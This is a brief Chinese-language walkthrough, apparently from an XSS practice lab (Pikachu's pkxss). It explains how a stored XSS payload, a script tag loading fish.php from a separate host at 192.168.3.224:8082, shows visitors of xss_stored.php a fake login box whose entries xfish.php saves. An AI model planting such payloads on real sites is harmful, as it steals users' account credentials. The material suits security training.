攻击思路：提供一个与攻击网站相似的登陆的钓鱼页面；让用户输入登陆信息

查看项目源代码，首先访问 fish.php ,提供输入的登陆框，

从登陆框获取到账号、密码后，重定向到xfish.php 做保存；

因此，需要一个payload，让他跳转到fish.php 页面； 使用xss 的存储型 漏洞，构造payload，弹出输入账号、密码的窗口

<script src="http://192.168.3.224:8082/pkxss/xfish/fish.php"></script>

弹出登录框，存储型xss ，后续每次用户访问 xss_stored.php页面，都会弹出登录框，诱导用户输入账号密码；从而获取用户的账号信息。